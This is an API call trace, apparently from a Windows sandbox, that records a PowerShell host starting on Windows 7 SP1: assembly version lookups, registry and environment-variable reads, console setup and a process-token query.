	[0458.217] GetUserDefaultLocaleName (in: lpLocaleName=0x440e10, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0458.217] CoTaskMemFree (pv=0x440e10) 
	[0458.892] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0458.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0458.892] CoTaskMemFree (pv=0x4341c0) 
	[0458.894] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0458.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0458.894] CoTaskMemFree (pv=0x4341c0) 
	[0458.897] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0458.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0458.897] CoTaskMemFree (pv=0x4341c0) 
	[0458.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0458.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ada30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0458.906] SetErrorMode (uMode=0x1) returned 0x1
	[0458.906] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1adc40 | out: lpFileInformation=0x1adc40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0458.906] SetErrorMode (uMode=0x1) returned 0x1
	[0458.906] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adeb0 | out: lpdwHandle=0x1adeb0) returned 0x94c
	[0458.907] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d629c0 | out: lpData=0x2d629c0) returned 1
	[0458.908] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ade28, puLen=0x1ade20 | out: lplpBuffer=0x1ade28*=0x2d62a5c, puLen=0x1ade20) returned 1
	[0458.908] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62b38, puLen=0x1add90) returned 1
	[0458.908] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0458.908] CoTaskMemAlloc (cb=0x2e) returned 0x44c690
	[0458.908] lstrcpyW (in: lpString1=0x44c690, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0458.908] CoTaskMemFree (pv=0x44c690) 
	[0458.908] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62b8c, puLen=0x1add90) returned 1
	[0458.908] lstrlenW (lpString="System.Management.Automation") returned 28
	[0458.908] CoTaskMemAlloc (cb=0x3c) returned 0x44b560
	[0458.908] lstrcpyW (in: lpString1=0x44b560, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0458.909] CoTaskMemFree (pv=0x44b560) 
	[0458.909] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62be8, puLen=0x1add90) returned 1
	[0458.909] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0458.909] CoTaskMemAlloc (cb=0x20) returned 0x4485a0
	[0458.909] lstrcpyW (in: lpString1=0x4485a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0458.909] CoTaskMemFree (pv=0x4485a0) 
	[0458.909] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62c28, puLen=0x1add90) returned 1
	[0458.909] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0458.909] CoTaskMemAlloc (cb=0x44) returned 0x44b560
	[0458.909] lstrcpyW (in: lpString1=0x44b560, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0458.909] CoTaskMemFree (pv=0x44b560) 
	[0458.909] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62c90, puLen=0x1add90) returned 1
	[0458.909] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0458.909] CoTaskMemAlloc (cb=0x76) returned 0x3ef2f0
	[0458.909] lstrcpyW (in: lpString1=0x3ef2f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0458.909] CoTaskMemFree (pv=0x3ef2f0) 
	[0458.909] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62d2c, puLen=0x1add90) returned 1
	[0458.909] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0458.909] CoTaskMemAlloc (cb=0x44) returned 0x44b560
	[0458.909] lstrcpyW (in: lpString1=0x44b560, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0458.909] CoTaskMemFree (pv=0x44b560) 
	[0458.909] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62d90, puLen=0x1add90) returned 1
	[0458.909] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0458.909] CoTaskMemAlloc (cb=0x58) returned 0x3a6430
	[0458.909] lstrcpyW (in: lpString1=0x3a6430, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0458.910] CoTaskMemFree (pv=0x3a6430) 
	[0458.910] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62e0c, puLen=0x1add90) returned 1
	[0458.910] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0458.910] CoTaskMemAlloc (cb=0x20) returned 0x4485a0
	[0458.910] lstrcpyW (in: lpString1=0x4485a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0458.910] CoTaskMemFree (pv=0x4485a0) 
	[0458.910] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x2d62ab4, puLen=0x1add90) returned 1
	[0458.910] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0458.910] CoTaskMemAlloc (cb=0x66) returned 0x4477a0
	[0458.910] lstrcpyW (in: lpString1=0x4477a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0458.910] CoTaskMemFree (pv=0x4477a0) 
	[0458.910] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x0, puLen=0x1add90) returned 0
	[0458.910] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x0, puLen=0x1add90) returned 0
	[0458.910] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1add98, puLen=0x1add90 | out: lplpBuffer=0x1add98*=0x0, puLen=0x1add90) returned 0
	[0458.910] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1add68, puLen=0x1add60 | out: lplpBuffer=0x1add68*=0x2d62a5c, puLen=0x1add60) returned 1
	[0458.910] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0458.910] VerLanguageNameW (in: wLang=0x0, szLang=0x3f1af0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0458.910] CoTaskMemFree (pv=0x3f1af0) 
	[0458.910] VerQueryValueW (in: pBlock=0x2d629c0, lpSubBlock="\\", lplpBuffer=0x1addb8, puLen=0x1addb0 | out: lplpBuffer=0x1addb8*=0x2d629e8, puLen=0x1addb0) returned 1
	[0458.917] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0458.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0458.917] CoTaskMemFree (pv=0x4341c0) 
	[0458.921] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0458.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0458.921] CoTaskMemFree (pv=0x4341c0) 
	[0459.352] lstrlenW (lpString="䅁") returned 1
	[0459.363] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adc88 | out: phkResult=0x1adc88*=0x2f8) returned 0x0
	[0459.364] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adc78 | out: phkResult=0x1adc78*=0x2fc) returned 0x0
	[0459.365] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1add08 | out: phkResult=0x1add08*=0x300) returned 0x0
	[0459.370] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adc4c, lpData=0x0, lpcbData=0x1adc48*=0x0 | out: lpType=0x1adc4c*=0x1, lpData=0x0, lpcbData=0x1adc48*=0x56) returned 0x0
	[0459.371] CoTaskMemAlloc (cb=0x5a) returned 0x447730
	[0459.371] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adc1c, lpData=0x447730, lpcbData=0x1adc18*=0x56 | out: lpType=0x1adc1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1adc18*=0x56) returned 0x0
	[0459.371] CoTaskMemFree (pv=0x447730) 
	[0459.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0459.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0459.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0459.902] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0459.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.902] CoTaskMemFree (pv=0x4341c0) 
	[0461.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0461.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0462.940] CoTaskMemAlloc (cb=0x104) returned 0x4342d0
	[0462.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4342d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.940] CoTaskMemFree (pv=0x4342d0) 
	[0462.941] CoTaskMemAlloc (cb=0x104) returned 0x4342d0
	[0462.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4342d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.941] CoTaskMemFree (pv=0x4342d0) 
	[0462.972] CoTaskMemAlloc (cb=0x104) returned 0x4342d0
	[0462.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4342d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.972] CoTaskMemFree (pv=0x4342d0) 
	[0462.974] CoTaskMemAlloc (cb=0x104) returned 0x4342d0
	[0462.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4342d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.974] CoTaskMemFree (pv=0x4342d0) 
	[0462.974] CoTaskMemAlloc (cb=0x104) returned 0x4342d0
	[0462.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4342d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.974] CoTaskMemFree (pv=0x4342d0) 
	[0465.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0465.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0465.853] CoTaskMemAlloc (cb=0x104) returned 0x4342d0
	[0465.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4342d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.853] CoTaskMemFree (pv=0x4342d0) 
	[0465.856] CoTaskMemAlloc (cb=0x104) returned 0x4342d0
	[0465.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4342d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.856] CoTaskMemFree (pv=0x4342d0) 
	[0466.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0470.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0470.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0475.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0475.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0476.437] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0476.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.437] CoTaskMemFree (pv=0x4344f0) 
	[0476.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0476.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0476.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0477.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0477.134] SetErrorMode (uMode=0x1) returned 0x1
	[0477.134] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1adbe0 | out: lpFileInformation=0x1adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0477.134] SetErrorMode (uMode=0x1) returned 0x1
	[0479.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0479.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0479.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0479.513] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0479.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0479.513] CoTaskMemFree (pv=0x4344f0) 
	[0479.516] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0479.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0479.517] CoTaskMemFree (pv=0x4344f0) 
	[0479.517] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0479.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0479.517] CoTaskMemFree (pv=0x4344f0) 
	[0479.520] CoCreateGuid (in: pguid=0x1adfa8 | out: pguid=0x1adfa8*(Data1=0xa4271995, Data2=0x888a, Data3=0x43e8, Data4=([0]=0xb7, [1]=0xe1, [2]=0xe, [3]=0xf6, [4]=0xf3, [5]=0xb0, [6]=0x55, [7]=0x48))) returned 0x0
	[0479.523] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0479.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0479.523] CoTaskMemFree (pv=0x4344f0) 
	[0479.526] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0479.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0479.526] CoTaskMemFree (pv=0x4344f0) 
	[0479.528] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0479.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0479.528] CoTaskMemFree (pv=0x4344f0) 
	[0479.536] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0480.656] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1adc50 | out: lpConsoleScreenBufferInfo=0x1adc50) returned 1
	[0480.663] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0480.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1adc50 | out: lpConsoleScreenBufferInfo=0x1adc50) returned 1
	[0480.665] GetVersionExW (in: lpVersionInformation=0x1adbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0480.667] GetCurrentProcess () returned 0xffffffffffffffff
	[0480.668] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1adc78 | out: TokenHandle=0x1adc78*=0x19c) returned 1
